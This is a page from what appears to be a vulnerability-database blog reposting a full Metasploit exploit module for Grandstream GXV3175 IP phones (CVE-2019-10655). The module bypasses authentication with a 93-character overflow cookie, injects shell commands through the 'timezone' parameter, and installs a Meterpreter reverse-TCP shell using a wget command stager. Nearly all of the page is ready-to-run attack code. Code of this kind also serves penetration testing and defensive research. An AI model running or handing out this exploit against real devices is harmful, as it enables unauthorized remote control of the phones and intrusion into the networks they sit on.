Sunday, January 23, 2022

Grandstream GXV3175 Unauthenticated Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze

def initialize(info = {})
super(
update_info(
info,
'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
'Description' => %q{
This module exploits a command injection vulnerability in Grandstream GXV3175
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.

A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.

This module was tested successfully on Grandstream GXV3175v2
hardware revision V2.6A with firmware version 1.0.1.19.
},
'Author' => [
'alhazred', # Command injection vulnerability discovery and exploit
'Brendan Scarvell', # Auth bypass discovery
'bcoles' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' => [
[ 'CVE', '2019-10655' ],
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
[ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
},
'DisclosureDate' => '2016-09-01',
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'DefaultOptions' => {
'PrependFork' => true,
'MeterpreterTryToFork' => true,
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget'
},
'CmdStagerFlavor' => %w[wget],
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0
)
)
end

def check
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => ''
}
)

if res && res.code == 200 && res.body.to_s.include?('Response=Success')
return CheckCode::Detected('phonecookie authentication bypassed successfully.')
end

CheckCode::Safe
end

def execute_command(cmd, _opts)
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => "`#{cmd}`"
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
end
unless res.body.to_s.include?('Response=Success')
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
end
end

def exploit
execute_cmdstager(
linemax: 220, # 255 minus URL encoding
background: true
)
end
end
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore